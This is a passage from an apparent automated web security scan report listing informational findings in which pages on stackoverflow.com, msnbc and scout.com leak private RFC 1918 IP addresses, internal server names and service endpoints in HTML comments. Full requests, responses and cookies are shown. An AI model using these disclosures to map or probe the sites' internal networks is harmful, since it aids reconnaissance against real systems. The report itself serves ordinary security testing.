Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 15:12:26 GMT
Last-Modified: Sun, 30 Jan 2011 15:11:26 GMT
Vary: *
Date: Sun, 30 Jan 2011 15:11:25 GMT
Content-Length: 194989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Stack Overflow</title>

<link rel="stylesheet" type="text/css
...[SNIP]...
rther. because shows the error as Failed to retrieve the preconfiguration file ... ... The file needed for preconfiguration could not be retrieved from ... ... &hellip; ">cant access file from http://192.168.1.2:8774/preseed/preseed.conf in ubuntu cloud controller</a>
...[SNIP]...

27.44. http://stackoverflow.com/questions

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stackoverflow.com
Path:   /questions

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /questions HTTP/1.1
Host: stackoverflow.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gauthed=1; __qca=P0-251589161-1296400348182; __utmz=140029553.1296400348.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140029553.594979447.1296400348.1296400348.1296400348.1; __utmc=140029553; __utmb=140029553.1.10.1296400348

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:42 GMT
Content-Length: 51939


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Newest Questions - Stack Overflow</title>

<link rel="stylesh
...[SNIP]...
<a href="/questions/4843557/cant-access-file-from-http-192-168-1-28774-preseed-preseed-conf-in-ubuntu-clou" class="question-hyperlink">cant access file from http://192.168.1.2:8774/preseed/preseed.conf in ubuntu cloud controller</a>
...[SNIP]...

27.45. http://www.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
RTSS: 1
Expires: Sat, 29 Jan 2011 23:53:39 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 23:53:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.redacted
Set-Cookie: SSID=AwDszSkAAAAAg6hETc0GBAmDqERNAQAAAAAAAAAAAAAAAACDqERNAAAAAAAAAAAAAAA; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
Set-Cookie: SSSC=108.G5567760320082216653.1.0.0; path=/; domain=.redacted
Set-Cookie: SSRT=g6hETQE; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
Set-Cookie: MC1=GUID=a90948ea4b8d4829b2d58fc150cbb23e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Content-Length: 208222

<html><head>
<!-- // --><script language='javascript' type='text/javascript'>
<!--
   req_108_1296345219=new Image();
req_108_1296345219.src='/__ssobj/ard.png?5567760320082216653_1_0-108-'+(11527*112461
...[SNIP]...
<!--endpoint: http://10.7.224.218:8083/sunbowservice/topics.svc/one-->
...[SNIP]...

27.46. http://www.msnbc.redacted/id/24780215/ns/technology_and_science-games

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/24780215/ns/technology_and_science-games

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /id/24780215/ns/technology_and_science-games HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 03:09:37 GMT
Date: Sun, 30 Jan 2011 03:09:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 150460

<html><head><title>CITIZEN GAMER- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21589549" /><link rel="
...[SNIP]...
<!--endpoint: http://10.7.224.218:8083/sunbowservice/topics.svc/one-->
...[SNIP]...

27.47. http://www.msnbc.redacted/id/3032072/ns/business

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032072/ns/business

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /id/3032072/ns/business HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:54:06 GMT
Date: Sat, 29 Jan 2011 23:54:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 189439

<html><head><title>Business &amp; financial news headlines, latest market updates, breaking news on the economy, real estate and personal finance- msnbc.com</title><link rel="stylesheet" type="text/cs
...[SNIP]...
<!--endpoint: http://10.7.224.218:8083/sunbowservice/topics.svc/one-->
...[SNIP]...

27.48. http://www.msnbc.redacted/id/3032076/ns/health

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032076/ns/health

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /id/3032076/ns/health HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:54:03 GMT
Date: Sat, 29 Jan 2011 23:54:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 169703

<html><head><title>Health, Diet and Nutrition News &amp; Information - Read Current Articles, Men's, Women's and Children Health - MSNBC.com- msnbc.com</title><link rel="stylesheet" type="text/css" hr
...[SNIP]...
<!--endpoint: http://10.7.224.218:8083/sunbowservice/topics.svc/one-->
...[SNIP]...

27.49. http://www.msnbc.redacted/id/3032118/ns/technology_and_science

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032118/ns/technology_and_science

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /id/3032118/ns/technology_and_science HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:53:43 GMT
Date: Sat, 29 Jan 2011 23:53:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 176958

<html><head><title>Technology &amp; Science Breaking News Leader - MSNBC - Get the Latest Computer, Space, Gadgets, and Tech Innovation Headlines from Across the World- msnbc.com</title><link rel="sty
...[SNIP]...
<!--endpoint: http://10.7.224.218:8083/sunbowservice/topics.svc/one-->
...[SNIP]...

27.50. http://www.msnbc.redacted/id/3032507/ns/world_news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032507/ns/world_news

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /id/3032507/ns/world_news HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:53:40 GMT
Date: Sat, 29 Jan 2011 23:53:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 162755

<html><head><title>World News - Daily International Stories from Around the World- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/cs
...[SNIP]...
<!--endpoint: http://10.7.224.218:8083/sunbowservice/topics.svc/one-->
...[SNIP]...

27.51. http://www.msnbc.redacted/id/3032525/ns/us_news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032525/ns/us_news

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /id/3032525/ns/us_news HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:53:39 GMT
Date: Sat, 29 Jan 2011 23:53:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 167360

<html><head><title>US News - Current Education, Business and Security Headlines from Across the US- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="styleshe
...[SNIP]...
<!--endpoint: http://10.7.224.218:8083/sunbowservice/topics.svc/one-->
...[SNIP]...

27.52. http://www.msnbc.redacted/id/3032553/ns/politics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3032553/ns/politics

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /id/3032553/ns/politics HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sat, 29 Jan 2011 23:53:42 GMT
Date: Sat, 29 Jan 2011 23:53:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 145418

<html><head><title>Politics - Political News &amp; Updates- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href="/default.ashx/
...[SNIP]...
<!--endpoint: http://10.7.224.218:8083/sunbowservice/topics.svc/one-->
...[SNIP]...

27.53. http://www.msnbc.redacted/id/3053415/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/3053415/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /id/3053415/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 01:55:02 GMT
Date: Sun, 30 Jan 2011 01:55:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 207572

<html><head><title>Breaking News, Weather, Business, Health, Entertainment, Sports, Politics, Travel, Science, Technology, Local, US &amp; World News - msnbc.com</title><link rel="stylesheet" type="te
...[SNIP]...
<!--endpoint: http://10.7.224.218:8083/sunbowservice/topics.svc/one-->
...[SNIP]...

27.54. http://www.msnbc.redacted/id/8004316/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/8004316/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /id/8004316/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 01:57:20 GMT
Date: Sun, 30 Jan 2011 01:57:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 165221

<html><head><title>Top Videos - Videos &amp; Clips of Top News Stories &amp; Headlines - msnbc.com- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="styleshe
...[SNIP]...
<!--endpoint: http://10.7.224.218:8083/sunbowservice/topics.svc/one-->
...[SNIP]...

27.55. http://www.scout.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:25:49 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:35:49 GMT
Last-Modified: Sat, 29 Jan 2011 23:54:38 GMT
ETag: "1CBC00FE3423300"
Content-Type: text/html
Content-Length: 99726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com - College and High School Football, Basketball, Recruiti
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=143&p=1&noredir=1&fromprefetch=1
By:
Date: Sat Jan 29 15:54:37 PST 2011
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 3:54:36 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=143&p=1&noredir=1&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 154 ms
-->
...[SNIP]...

27.56. http://www.scout.com/3/college-links.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/college-links.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/college-links.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:00 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12628

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 5:27:00 PM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=college-links
Server IP: 192.168.20.57, STATIC2
Page Execution Time: 47 ms
-->
...[SNIP]...

27.57. http://www.scout.com/3/college-links.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/college-links.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/college-links.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:39 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12625

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 9:16:39 AM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=college-links
Server IP: 192.168.20.88, MARKET
Page Execution Time: 36 ms
-->
...[SNIP]...

27.58. http://www.scout.com/3/company.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/company.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/company.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:37 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14471

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Company Overview</title>
<meta http-equiv
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 9:16:37 AM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=company
Server IP: 192.168.20.56, STATIC1
Page Execution Time: 45 ms
-->
...[SNIP]...

27.59. http://www.scout.com/3/company.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/company.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/company.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:50 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14472

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Company Overview</title>
<meta http-equiv
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 5:26:50 PM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=company
Server IP: 192.168.20.88, MARKET
Page Execution Time: 35 ms
-->
...[SNIP]...

27.60. http://www.scout.com/3/fair-use.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/fair-use.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/fair-use.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:39 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13618

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Fair Use</title>
<meta http-equiv="Conten
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 5:26:39 PM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=fair-use
Server IP: 192.168.20.88, MARKET
Page Execution Time: 36 ms
-->
...[SNIP]...

27.61. http://www.scout.com/3/fair-use.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/fair-use.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/fair-use.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:35 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:35 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13617

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Fair Use</title>
<meta http-equiv="Conten
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 9:16:35 AM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=fair-use
Server IP: 192.168.20.56, STATIC1
Page Execution Time: 53 ms
-->
...[SNIP]...

27.62. http://www.scout.com/3/jobs.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/jobs.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/jobs.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:51 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18927

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Jobs at Scout.com</title>
<meta http-equi
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 5:26:51 PM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=jobs
Server IP: 192.168.20.57, STATIC2
Page Execution Time: 52 ms
-->
...[SNIP]...

27.63. http://www.scout.com/3/jobs.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/jobs.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/jobs.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:37 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18925

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Jobs at Scout.com</title>
